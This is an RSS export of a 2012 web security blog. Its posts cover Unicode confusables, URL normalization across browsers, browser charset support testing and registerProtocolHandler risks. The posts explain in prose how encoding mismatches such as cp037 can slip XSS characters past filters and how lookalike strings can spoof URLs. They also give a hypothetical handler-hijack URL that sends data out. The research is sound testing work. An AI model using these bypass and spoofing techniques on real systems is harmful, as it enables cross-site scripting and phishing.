<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0' version='2.0'><channel><atom:id>tag:blogger.com,1999:blog-3867003125940558889</atom:id><lastBuildDate>Mon, 21 May 2012 06:10:51 +0000</lastBuildDate><category>fuzzing</category><category>ICU</category><category>UTF8</category><category>protocol</category><category>marshalling</category><category>tools</category><category>advisory</category><category>gflags</category><category>debugging</category><category>encoding</category><category>W3C</category><category>development</category><category>ping</category><category>malware</category><category>penetration testing</category><category>URI</category><category>encodings</category><category>Windows</category><category>normalization</category><category>bitlocker</category><category>code2000</category><category>general</category><category>sql injection</category><category>BOM</category><category>browsers</category><category>Web</category><category>spoofing</category><category>firefox</category><category>sharepoint</category><category>whitelist</category><category>ActiveX</category><category>confusables</category><category>cross site request forgery</category><category>browser</category><category>viewstateuserkey</category><category>SSL</category><category>mashup</category><category>cross domain</category><category>Watcher</category><category>code review</category><category>debug</category><category>scheme</category><category>IRI</category><category>charsets</category><category>CSIDL</category><category>internet explorer</category><category>IDNA</category><category>security</category><category>Opera</category><category>test cases</category><category>utf-8</category><category>IDN</category><category>font</category><category>web services</category><category>rootkit</category><category>phishing</category><category>Unicode</category><category>software</category><category>pageheap</category><category>HTML</category><category>asp.net</category><category>TLS</category><category>cascading style sheets</category><category>testing</category><category>cross site scripting</category><category>specifications</category><category>RLO</category><category>JavaScript</category><category>plugins</category><category>XSS</category><category>Webkit</category><category>moss</category><category>best-fit</category><category>filtering</category><category>sitelock</category><category>OpenBSD</category><title>chris weber's blog</title><description></description><link>http://web.lookout.net/</link><managingEditor>noreply@blogger.com (Chris Weber)</managingEditor><generator>Blogger</generator><openSearch:totalResults>81</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-8126973241422461874</guid><pubDate>Thu, 05 Apr 2012 00:43:00 +0000</pubDate><atom:updated>2012-04-04T17:43:57.509-07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>confusables</category><title>Generating confusable, lookalike strings</title><description>&lt;p&gt;The Unicode Consortium released a &lt;a href="http://unicode.org/cldr/utility/confusables.jsp"&gt;utility to generate confusable strings&lt;/a&gt; quite a while ago.  Since I've seen people trying to create similar tools themselves recently, I thought it might be worth mentioning.&lt;/p&gt;    &lt;p&gt;In case you haven't received the memo about confusables, also known as homoglyphs, lookalikes, and spoofs - they are characters that visually resemble or are indistinguishable from another character.  You can read more about it &lt;a href="http://web.lookout.net/search/label/confusables"&gt;here&lt;/a&gt; or virtually any other place on the Web by searching for some of these terms.  For example the following two characters are visually similar and confusing:&lt;/p&gt; &lt;p&gt;FF21 ; 0041 ; SA # ( Ａ → A ) FULLWIDTH LATIN CAPITAL LETTER A → LATIN CAPITAL LETTER A&lt;/p&gt; &lt;p&gt;Sometimes during penetration testing, we want to bypass profanity filters, spoof URLs, spoof email addresses, or perform other tasks.  Being able to generate lookalike strings can be quite useful in these cases, but of course is not the only method required.  If you require such capability, then go check out the Unicode Consortium's utility at &lt;a href="http://unicode.org/cldr/utility/confusables.jsp"&gt;http://unicode.org/cldr/utility/confusables.jsp&lt;/a&gt;, but please don't share this link with the bad guys.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-8126973241422461874?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2012/04/generating-confusable-lookalike-strings.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-7639801766850942254</guid><pubDate>Sat, 17 Mar 2012 19:22:00 +0000</pubDate><atom:updated>2012-04-12T14:09:31.645-07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>URI</category><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><category domain='http://www.blogger.com/atom/ns#'>normalization</category><category domain='http://www.blogger.com/atom/ns#'>IRI</category><title>Unicode Normalization in URLs</title><description>&lt;p&gt;In some contexts, normalizing a string means upper or lower-casing it.  In Unicode "&lt;a href="http://www.unicode.org/reports/tr15/"&gt;normalization&lt;/a&gt;" means something much different.  The Unicode standard offers four "normalization" forms which irreversibly transform a given character or sequence of characters according to either a simple mapping rule, or a more complex algorithmic rule.  -Since browser interoperability depends on each browser processing a URL the same as the next, I thought testing some of the more popular browsers might be a good idea.  &lt;/p&gt; &lt;h2&gt;Why should you care?&lt;/h2&gt;&lt;p&gt;If you're a Web developer using Unicode anywhere in your URLs, then you're probably concerned when those URLs get handled differently in various Web browsers.  If you're a penetration tester, you probably like to find quirky ways that URLs get transformed.&lt;/p&gt;     &lt;h2&gt;Test Setup&lt;/h2&gt;&lt;p&gt;To test Unicode normalization I used some of the character sequences from &lt;a href="http://www.unicode.org/reports/tr15"&gt;Unicode Standard Annex 15 "Unicode Normalization Forms"&lt;/a&gt; and others from RFC3197.  From TR15 I looked at a Singleton from Figure 3 - U+212B which normalizes to U+00C5 &amp;#x00C5; under NFC, and U+0041 U+030A A&amp;#x030A; under NFD.  I also looked at multiple combining marks from Figure 5, U+10EB U+0323 &amp;#x10EB;&amp;#x0323;, and the sequence U+1E9B U+0323 &amp;#x1E9B;&amp;#x0323; from Figure 6 Compatibility Composites.  Through those few tests we can test for each of the four normalization forms, and see NFC being applied in Safari and Chrome (in different ways), and rule out NFD, NFKC, and NFKD. &lt;/p&gt;  &lt;h2&gt;Test Results&lt;/h2&gt; &lt;p&gt;I was hoping to find some security bugs, but only found interoperability bugs.  That doesn't mean security bugs don't exist here.  As if URLs weren't tricky enough with plain old ASCII, handling Unicode characters makes them even more open to interpretation.  For example, an Internationalized Resource Identifier (IRI) with a path, query, and fragment containing U+212B &lt;span class="code"&gt;#Å&lt;/span&gt; means code point U+212B to IE, Firefox, and Opera, but it means U+00C5 &lt;span class="code"&gt;#Å&lt;/span&gt; to Chrome (in the fragment only), and U+00C5 percent-encoded &lt;span class="code"&gt;#%C3%85&lt;/span&gt; to Safari (in the path, query, and fragment).   &lt;/p&gt; &lt;p&gt;These types of character transformations make for ripe targets in security testing, but only when the resulting character has some practical use such as bypassing an XSS or SQL injection filter.  When a certain input X transforms to become Y, an attacker has more opportunity slip a malicious link or XSS payload past an unsuspecting defensive filter.  In testing how Web browsers normalize Unicode across a URL/IRIs components, I made the following observations.&lt;/p&gt; &lt;ol&gt;&lt;li&gt;Safari applies NFC normalization to the path, query, and fragment.&lt;/li&gt;&lt;li&gt;Chrome applies NFC normalization to the fragment only.&lt;/li&gt;&lt;li&gt;MSIE, Firefox, and Opera do not apply normalization anywhere.&lt;/li&gt;&lt;li&gt;MSIE violates RFC 3986 by sending raw, unescaped UTF-8 bytes in the query during an HTTP request.&lt;/li&gt;&lt;li&gt;Chrome, Safari, Firefox, and Opera all send percent-encoded UTF-8 in the path and query during an HTTP request&lt;/li&gt;&lt;li&gt;Safari percent-encodes the fragment.&lt;/li&gt;&lt;/ol&gt; &lt;p&gt;Firefox and Opera seem to be the only two that agree in all tests, Chrome is a little odd with the fragment, and Safari is the odd-guy out across the entire URL.  IE is the only browser that sends raw UTF-8 encoded bytes out on the wire (in the query component only), but I think that &lt;a href="http://tools.ietf.org/html/rfc3986#section-3.4"&gt;RFC 3986 allows for that anyway&lt;/a&gt;.   &lt;p&gt;My conclusions were based on reviewing the following:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;The DOM property values for the anchor element, which included an individual the test case.&lt;/li&gt;&lt;li&gt;The raw HTTP GET request (for the img) as sniffed off the wire using winpcap, triggered by a test case using the img element&lt;/li&gt;&lt;/ol&gt; &lt;p&gt;The spreadsheet spreadsheet below includes table of results observed from the &lt;a href="http://www.lookout.net/test/iri/normalize.php"&gt;test cases&lt;/a&gt;, and can also be &lt;a href="https://docs.google.com/spreadsheet/pub?hl=en_US&amp;key=0At1OFOiVqCrvdFo3aFc1elhXS2pnVkpxOFZORjQ1cUE&amp;hl=en_US&amp;gid=4"&gt;opened in a separate window&lt;/a&gt;.&lt;/p&gt; &lt;iframe width='800' height='800' frameborder='0' src='https://docs.google.com/spreadsheet/pub?key=0At1OFOiVqCrvdFo3aFc1elhXS2pnVkpxOFZORjQ1cUE&amp;output=html&amp;gid=4&amp;widget=true'&gt;&lt;/iframe&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-7639801766850942254?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2012/03/unicode-normalization-in-urls.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>6</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-7470854390767278397</guid><pubDate>Mon, 13 Feb 2012 17:09:00 +0000</pubDate><atom:updated>2012-02-13T09:09:46.459-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>Web</category><category domain='http://www.blogger.com/atom/ns#'>browsers</category><category domain='http://www.blogger.com/atom/ns#'>charsets</category><category domain='http://www.blogger.com/atom/ns#'>encodings</category><title>Testing charset encoding support in Web Browsers</title><description>Note: To jump straight to test page click here &lt;a href="http://www.lookout.net/test/charsets/iana-charset-support/"&gt;http://www.lookout.net/test/charsets/ascii-unsafe/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Web browsers support a variety of character set encodings mostly for legacy reasons and backwards compatibility.  After all, UTF-8 and a handful of other encodings today are capable of representing all of the characters that were once relegated to a wide assortment of character encodings.  It's clearly evident from Google's February 2012 report that UTF-8 is dominating the Web, with&amp;nbsp;&lt;a href="http://googleblog.blogspot.com/2012/02/unicode-over-60-percent-of-web.html"&gt;60% of Web documents using UTF-8&lt;/a&gt;&amp;nbsp;- and that number is rising as other legacy character encodings are declining in use. &lt;br /&gt;&lt;br /&gt;Those of us who test Web application security are often concerned with character encodings in our attempts to manipulate string input in ways that would eventually lead to mayhem.  For that reason it's good to know a bit not just about which encodings the server-side components support, but also which ones the Web browser supports.  I've documented the results of &lt;a href="http://www.lookout.net/test/charsets/iana-charset-support/"&gt;testing character set support in Web browsers&lt;/a&gt; in the table below, along with a brief summary. &lt;br /&gt;&lt;h2&gt;Test Results&lt;/h2&gt;The following table, which can also be &lt;a href="https://docs.google.com/spreadsheet/pub?hl=en_US&amp;amp;hl=en_US&amp;amp;key=0At1OFOiVqCrvdFo3aFc1elhXS2pnVkpxOFZORjQ1cUE&amp;amp;single=true&amp;amp;gid=2&amp;amp;output=html"&gt;opened in a new window&lt;/a&gt;, lists all of the supported charset encodings in each Web browser tested on a Windows 7 and Ubuntu 11.10 OS where possible. &amp;nbsp;Testing was only concerned with &lt;a href="http://www.iana.org/assignments/character-sets"&gt;IANA's official list of character set names&lt;/a&gt; that may be used on the Internet. &lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Default Fallback Encoding&lt;/h3&gt;Most browsers use UTF-8 as the default fallback encoding. &amp;nbsp;However Safari, and Chrome on Ubuntu, fell back to ISO-8859-1 when an unrecognized charset label, such as "freshies", was tested. &lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Supported charset labels&lt;/h3&gt;The results also show all supported character set labels per browser, in a comma-separated form of&amp;nbsp;&lt;span style="color: green; font-family: 'Bitstream Vera Sans Mono', 'Andale Mono', 'Lucida Console', monospace, fixed; word-spacing: 2px;"&gt;named_charset&lt;/span&gt;&lt;span class="framecharset" style="color: grey; font-family: 'Bitstream Vera Sans Mono', 'Andale Mono', 'Lucida Console', monospace, fixed; margin-bottom: 2px; margin-left: 2px; margin-right: 2px; margin-top: 2px; padding-bottom: 2px; padding-left: 2px; padding-right: 2px; padding-top: 2px; word-spacing: 2px;"&gt;,interpreted_charset&lt;/span&gt;&amp;nbsp;where the named_charset was the test case and the interpreted_charset was what the Web browser's &lt;span class="code"&gt;contentDocument.charset&lt;/span&gt; property returned. &amp;nbsp;Using&amp;nbsp;&lt;span style="color: green; font-family: 'Bitstream Vera Sans Mono', 'Andale Mono', 'Lucida Console', monospace, fixed; word-spacing: 2px;"&gt;iso-ir-144&lt;/span&gt;&lt;span class="framecharset" style="color: grey; font-family: 'Bitstream Vera Sans Mono', 'Andale Mono', 'Lucida Console', monospace, fixed; margin-bottom: 2px; margin-left: 2px; margin-right: 2px; margin-top: 2px; padding-bottom: 2px; padding-left: 2px; padding-right: 2px; padding-top: 2px; word-spacing: 2px;"&gt;,ISO-8859-5&lt;/span&gt;&amp;nbsp;as an example - the test returned a document with the HTTP Content-Type set to iso-ir-144. &amp;nbsp;Then the&amp;nbsp;&lt;span class="code"&gt;contentDocument.charset&lt;/span&gt; property was checked and found to be ISO-8859-1. &amp;nbsp;Since the two were aliases for one another the test was considered a pass, meaning the charset label was supported by the browser.&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Charset labels that fallback to non-equivocal&amp;nbsp;IANA alias&lt;/h3&gt;If the&amp;nbsp;&lt;span class="code"&gt;contentDocument.charset&lt;/span&gt; returned a value that was not an equivalent charset alias for the test case (according to IANA's list) then it was deemed a failed test case. &amp;nbsp;Often however, the interpreted_charset was in fact an equivalent, or superset, encoding, even though it was not listed as so by IANA. &amp;nbsp;In some barely interesting cases a vendor-specific charset label could be found this way, such as &lt;span class="code"&gt;unicodeFEFF&lt;/span&gt; which seems to only be used by Internet Explorer.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;iframe src="https://docs.google.com/spreadsheet/pub?hl=en_US&amp;amp;hl=en_US&amp;amp;key=0At1OFOiVqCrvdFo3aFc1elhXS2pnVkpxOFZORjQ1cUE&amp;amp;single=true&amp;amp;gid=2&amp;amp;output=html&amp;amp;widget=true" style="border: 0px; height: 800px; width: 100%;"&gt;&lt;/iframe&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-7470854390767278397?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2012/02/testing-charset-encoding-support-in-web.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total><georss:featurename>Seattle, WA, USA</georss:featurename><georss:point>47.6062095 -122.3320708</georss:point><georss:box>47.520564 -122.4899993 47.691855 -122.1741423</georss:box></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-1353962055014667303</guid><pubDate>Mon, 06 Feb 2012 16:00:00 +0000</pubDate><atom:updated>2012-02-06T19:41:29.205-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>Web</category><category domain='http://www.blogger.com/atom/ns#'>browsers</category><category domain='http://www.blogger.com/atom/ns#'>testing</category><category domain='http://www.blogger.com/atom/ns#'>charsets</category><title>Testing ASCII-unsafe encodings in Web browsers</title><description>Note: To jump straight to test page click here&amp;nbsp;&lt;a href="http://lookout.net/test/charsets/ascii-unsafe/"&gt;http://lookout.net/test/charsets/ascii-unsafe/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;[UPDATE: Some &lt;a href="https://plus.google.com/102891963682045703790/posts/TvKKdF4hstD"&gt;feedback &lt;/a&gt;from Anne van Kesteren pointed to the fact that all browsers do support HZ-GB-2312, even though the test results showed IE and Firefox did not. The direct URL for that particular encoding test is &lt;a href="http://lookout.net/test/charsets/ascii-unsafe/charset.php?alias=HZ-GB-2312"&gt;http://lookout.net/test/charsets/ascii-unsafe/charset.php?alias=HZ-GB-2312&lt;/a&gt;. Looking closer it seems the ICU trancoding added a two-byte preamble to the string, which are 0x7E 0x7D, or '~}'. I'm not very familiar with HZ-GB-2312 but a quick look at RFC 1843 tells me that this two-byte sequence switches the context from GB-mode to ASCII-mode. So it seems that Firefox and IE do not recognize this mode-switching byte-sequence, or at least not in this context.] &lt;br /&gt;&lt;br /&gt;Web browsers support a variety of character set encodings which could be broadly categorized as either ASCII-safe [1] or ASCII-unsafe [2]. &amp;nbsp;The goal of this test was to identify which ASCII-unsafe character encodings were supported by each Web browser.&lt;br /&gt;&lt;br /&gt;String encodings play an important role in testing Web applications for security vulnerability. &amp;nbsp;If I can control some input's encoding then I will manipulate it in ways that might confuse a parsing process or bypass a defensive filter. &amp;nbsp;To use a common example - imagine you input a string somewhere that includes the U+003E GREATER-THAN SIGN '&amp;gt;' in a meager attempt at cross-site scripting. &amp;nbsp;An XSS filter consumes the input as UTF-8 (which is ASCII-safe) and immediately recognizes the 0x3E byte sequences as something naughty, at which point it throws back an error message. &amp;nbsp;Since you realize that a query string parameter (e.g. &amp;amp;charset=utf-8) controls the page's output encoding you change the charset parameter's value to 'cp037' and encode the input string accordingly. &amp;nbsp;In the cp037 encoding, the '&amp;gt;' character is represented with the byte 0x6E, which in ASCII would be the 'n' character, two completely different characters. &amp;nbsp;The character slips by the filter which assumes it was encoded as UTF-8, and makes its way on to the destination. &amp;nbsp;The reason for the confusion was that the two encodings cp-037 and UTF-8 (ASCII-safe) are not compatible.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;How the testing was setup&lt;/h2&gt;The &lt;a href="http://lookout.net/test/charsets/ascii-unsafe/"&gt;test page&lt;/a&gt; attempts to identify which ASCII-unsafe charset a Web browser supports by loading a string encoded in each charset, and testing if the browser decoded it as expected. &amp;nbsp;The page uses the XmlHttpRequest to fetch each string from the server, which returns the string in an HTTP request that includes the Content-Type header, and the corresponding charset label for the test case. &amp;nbsp;The test page then decodes the string according to the charset label, and tests it for equivalence with the following static control string.&lt;br /&gt;&lt;br /&gt;&lt;pre&gt; $%'()*+,-./&amp;lt;&amp;gt;:;=&lt;/pre&gt;&lt;br /&gt;There are some potential pitfalls to this approach. &amp;nbsp;The most obvious being that the browser may not officially support the given charset encoding under test, but it instead may be applying some intelligence (e.g. sniffing) to the string to try and figure out what it's encoding could be. &amp;nbsp;For example, many of the ASCII-unsafe encodings share similar ranges of characters, where the '&amp;gt;' may actually be represented with byte 0x6E in all of of them. &amp;nbsp;So if you were to test using only a single character you might end up with false positives if the browser was sniffing and decided that the encoding was 'cp237' instead of the 'cp037'. &amp;nbsp;Although these are both variants of EBCDIC, there are some differences. &amp;nbsp;So the test ended up using a string of many characters, which still doesn't totally solve the challenge. &amp;nbsp;However, it works okay and produces decent results. &lt;br /&gt;&lt;br /&gt;Because the testing uses the&amp;nbsp;&lt;a href="http://userguide.icu-project.org/conversion/converters"&gt;ICU project&lt;/a&gt;&amp;nbsp;to build the test strings, it's limited to only the character set tables that ICU includes. &amp;nbsp;That's quite a lot mind you, but some other interesting &lt;a href="http://unicode.org/Public/MAPPINGS/VENDORS/"&gt;variants and oddities&lt;/a&gt; might not be included.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Transcoding the test string&lt;/h3&gt;The test string shown above uses 17 characters with familiar names - this string gets transcoded into 417 different character set encodings (the recurring 17 is just coincidence, I think). &amp;nbsp;Because most of the 417 labels are just aliases for a superset, they can be further grouped into a much smaller set of around 17 (just kidding) encodings. &lt;br /&gt;&lt;br /&gt;The &lt;a href="http://userguide.icu-project.org/conversion/converters"&gt;ICU project's Converter API&lt;/a&gt; was used to perform the transcoding. &amp;nbsp;ICU also provided all of the &lt;a href="http://demo.icu-project.org/icu-bin/convexp?"&gt;charset aliases/labels&lt;/a&gt; used for testing. &amp;nbsp;The code for transcoding is &lt;a href="https://github.com/cweb/web-charset-tests/blob/master/src/transcode/transcode.c"&gt;available on github&lt;/a&gt; for the curious. &lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Test Results&lt;/h2&gt;The following table, which can also be &lt;a href="https://docs.google.com/spreadsheet/pub?hl=en_US&amp;amp;hl=en_US&amp;amp;key=0At1OFOiVqCrvdFo3aFc1elhXS2pnVkpxOFZORjQ1cUE&amp;amp;output=html"&gt;opened in a new window&lt;/a&gt;, lists all of the ASCII-unsafe charsets supported in each Web browser tested. &lt;br /&gt;&lt;iframe src="https://docs.google.com/spreadsheet/pub?hl=en_US&amp;amp;hl=en_US&amp;amp;key=0At1OFOiVqCrvdFo3aFc1elhXS2pnVkpxOFZORjQ1cUE&amp;amp;single=true&amp;amp;gid=3&amp;amp;output=html&amp;amp;widget=true" style="border: 0px; height: 800px; width: 100%;"&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;h2&gt;Notes&lt;/h2&gt;[1] ascii-safe An ASCII-compatible character encoding is a single-byte or variable-length  encoding in which the bytes 0x09, 0x0A, 0x0C, 0x0D, 0x20 - 0x22, 0x26, 0x27,  0x2C - 0x3F, 0x41 - 0x5A, and 0x61 - 0x7A, ignoring bytes that are the second  and later bytes of multibyte sequences, all correspond to single-byte sequences  that map to the same Unicode characters as those bytes in  ANSI_X3.4-1968 (US-ASCII). [RFC1345] &lt;br /&gt;&lt;br /&gt;[2] ascii-unsafe ASCII-compatible bytes do not map.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-1353962055014667303?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2012/02/testing-ascii-unsafe-encodings-in-web.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-507807102126684043</guid><pubDate>Mon, 30 Jan 2012 17:42:00 +0000</pubDate><atom:updated>2012-02-21T21:12:45.724-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>Web</category><category domain='http://www.blogger.com/atom/ns#'>URI</category><category domain='http://www.blogger.com/atom/ns#'>W3C</category><category domain='http://www.blogger.com/atom/ns#'>scheme</category><title>Testing registerProtocolHandler and the web+ scheme prefix</title><description>&lt;p class="note"&gt;Note: jump straight to the &lt;a href="http://www.lookout.net/test/handler/"&gt;test page for navigator.registerProtocolHandler and web+&lt;/a&gt; if you'd rather...&lt;/p&gt;&lt;p&gt;A &lt;a href="http://tools.ietf.org/html/rfc3986"&gt;URI (Uniform Resource Identifier)&lt;/a&gt; is easily the most recognizable protocol element of the Web.  A URL (Uniform Resource Locator) is a form of URI which includes an access mechanism (e.g. a network location).  The terms are often used interchangeably, and to add to the terminology, these protocol elements may also be &lt;a href="http://tools.ietf.org/wg/iri"&gt;IRIs (Internationalized Resource Identifiers)&lt;/a&gt;, which can be thought of as a fork of URI that may include characters outside of the US-ASCII character set.  So, &lt;span class="code"&gt;http://www.lookout.net/index.html&lt;/span&gt; would qualify as a URL, a URI, and an IRI.  The 'scheme' part of this URI would be 'http', which refers to the specification that further defines how the URI parts should be processed.&lt;/p&gt;&lt;p&gt;The ABNF grammar for a &lt;a href="http://tools.ietf.org/html/rfc3986#section-3.1"&gt;URI scheme&lt;/a&gt; is defined by RFC3986 as: &lt;br /&gt;&lt;pre&gt;scheme = ALPHA *( ALPHA / DIGIT / "+" / "-" / "." )&lt;/pre&gt;&lt;/p&gt;&lt;p&gt;Quite simply, scheme names can only consist of the letters a-z, the numbers 0-9, and the three special characters '+', '-', and '.'.   Uppercase letters A-Z in a scheme name would be canonicalized to lowercase as defined by the spec and as we see in most implementations.  The syntax rules for a scheme are simple and do not impose arbitrary length limits, although most implementations will enforce their own length limit.  Schemes are registered through an official &lt;a href="http://www.iana.org/assignments/uri-schemes.html"&gt;IANA registry&lt;/a&gt;.  Depending on who you ask, the process is not difficult but does involve some time and a manual review.  The registry was designed to centrally coordinate and organize scheme registrations so they would be documented and publicly available.  However over the years, many scheme names have been invented by application owners who did not use this process.&lt;/p&gt; &lt;h2&gt;Protocol handlers in the Web browser&lt;/h2&gt;&lt;p&gt;The DOM function &lt;a href="https://developer.mozilla.org/en/DOM/window.navigator.registerProtocolHandler"&gt;navigator.registerProtocolHandler&lt;/a&gt; takes three parameters - a URI, a scheme name, and a title.  These are used to register a protocol scheme name, such as http or mailto, to an arbitrary URI that should be used to handle that scheme.  For example, you might want to let Hotmail register the 'mailto' protocol to be handled by some URI like &lt;span class="code"&gt;https://www.hotmail.com/?email=%s&lt;/span&gt;  The '%s' is required in the URI registration and will be replaced with the entire reference URI.&lt;/p&gt; &lt;p&gt;For example using the above registration, if you clicked on a link like &lt;span class="code"&gt;mailto:chris@lookout.net&lt;/span&gt; the browser would open &lt;span class="code"&gt;https://www.hotmail.com?email=mailto%3Achris%40lookout.net&lt;/span&gt;.  In fact, the registration may persist at the OS layer, in which case it would be available to any application. &lt;/p&gt; &lt;p&gt;web+ is a new scheme &lt;b&gt;prefix&lt;/b&gt; introduced by HTML5.  I'm not clear on the purpose of this new prefix, but I can imagine seeing future schemes like web+tweet, web+like, and web+comment.  In practice I suppose that application developers could register ad hoc schemes and would likely never go through the official IETF/IANA process.  Some schemes would end up becoming popular and persisting while others would just fade away.&lt;/p&gt; &lt;h2&gt;Risks to Security and Privacy&lt;/h2&gt;&lt;p&gt;Many risks have been documented in the W3C specification including the following:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Hijacking all Web usage&lt;/li&gt;&lt;li&gt;Hijacking defaults&lt;/li&gt;&lt;li&gt;Registration spamming&lt;/li&gt;&lt;li&gt;Misleading titles&lt;/li&gt;&lt;li&gt;Hostile handler metadata&lt;/li&gt;&lt;li&gt;Leaking Intranet URLs&lt;/li&gt;&lt;li&gt;Leaking secure URLs&lt;/li&gt;&lt;li&gt;Leaking credentials&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Others perhaps had not been considered or clearly listed, such as the capability to track users through unique identifiers appended to the web+ prefix, discussed more below.&lt;/p&gt; &lt;h2&gt;Test results&lt;/h2&gt;&lt;p&gt;The table below &lt;a href="https://docs.google.com/spreadsheet/pub?hl=en_US&amp;hl=en_US&amp;key=0At1OFOiVqCrvdFo3aFc1elhXS2pnVkpxOFZORjQ1cUE&amp;single=true&amp;gid=1&amp;output=html"&gt;can also be opened in a separate window&lt;/a&gt; summarizes the test results, which are discussed a bit more below.  The &lt;a href="http://www.lookout.net/test/handler/"&gt;test page&lt;/a&gt; is available online where you can quickly run the canned tests or create ad hoc tests.&lt;/p&gt; &lt;iframe style="width: 100%; height: 800px; border: 0px;" src="https://docs.google.com/spreadsheet/pub?hl=en_US&amp;hl=en_US&amp;key=0At1OFOiVqCrvdFo3aFc1elhXS2pnVkpxOFZORjQ1cUE&amp;single=true&amp;gid=1&amp;output=html"&gt;&lt;/iframe&gt; &lt;p&gt;As you can imagine, it would be devastating if one could register an arbitrary web+ scheme to the 'javascript' handler.  As many XSS filters around the web intentionally block 'javascript:' in forums and comments, they would be immediately hosed when web+foo could achieve the same affect.  It would be just as devastating if the 'http' handler could be controlled, so that all links ended up going to http://nottrusted.com?stealing=your%20data.  Fortunately, all browsers tested prohibited such registration attempts.&lt;/p&gt; &lt;p&gt;Also fortunate, all of the browsers tested properly prohibited cross-origin registrations, even within the same general domain - registrations to a subdomain and parent domain were both prohibited, as were registrations to completely different domains.  However, both Firefox and Opera allowed registrations to https from an http domain, but only Firefox allowed the reverse - registration from an https origin to http.  Additionally, Firefox was the only browser to allow registrations to URIs with completely arbitrary ports, e.g. 23.&lt;/p&gt; &lt;p&gt;And what characters are allowed in a web+ scheme? The specification allows only the letters a-z after the prefix, but does not propose limits on length.  Opera did not allow web+ registrations during testing, and both Chrome and Firefox allowed more than the small set of characters a-z.  In fact, Firefox allowed any character whatsover to be registered, &lt;b&gt;with or without the prefix&lt;/b&gt;, including any Unicode code point.  Chrome only allowed the characters +, -, ., a-z, A-Z, and 0-9, in the ASCII range.  Chrome was also liberal with Unicode and would allow most, but not all, code points above U+00FF.  Of course this is pointless, because having anything but the URI-defined set of limited ASCII in the scheme would be prohibited and instead interpreted as a relative path in all modern Web browsers.&lt;/p&gt; &lt;p&gt;The User Interface seemed quite confusing in all cases except for Opera, which set the clearest message of the bunch.  Both Chrome and Firefox used confusing messages that I cannot imagine a non-technical user would understand.  Heck they were even confusing to me.  Take a look at the following and judge for yourself, from top to bottom they are Opera, Firefox, and Chrome.&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-vqCAdpUphYc/TybYGiQKbrI/AAAAAAAAAMY/ritoua3mU14/s1600/ui-confusion-opera.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="40" width="400" src="http://1.bp.blogspot.com/-vqCAdpUphYc/TybYGiQKbrI/AAAAAAAAAMY/ritoua3mU14/s400/ui-confusion-opera.JPG" /&gt;&lt;/a&gt;&lt;/div&gt; &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-ejgdWiLQzkM/TybYJjnWLDI/AAAAAAAAAMk/09rceqbO4FI/s1600/ui-confusion-ff.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="33" width="400" src="http://1.bp.blogspot.com/-ejgdWiLQzkM/TybYJjnWLDI/AAAAAAAAAMk/09rceqbO4FI/s400/ui-confusion-ff.JPG" /&gt;&lt;/a&gt;&lt;/div&gt; &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-9qXCvXgCAq0/TybYJmQ-43I/AAAAAAAAAMs/UnBmpqLVlm4/s1600/ui-confusion-chrome.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="48" width="400" src="http://1.bp.blogspot.com/-9qXCvXgCAq0/TybYJmQ-43I/AAAAAAAAAMs/UnBmpqLVlm4/s400/ui-confusion-chrome.JPG" /&gt;&lt;/a&gt;&lt;/div&gt; 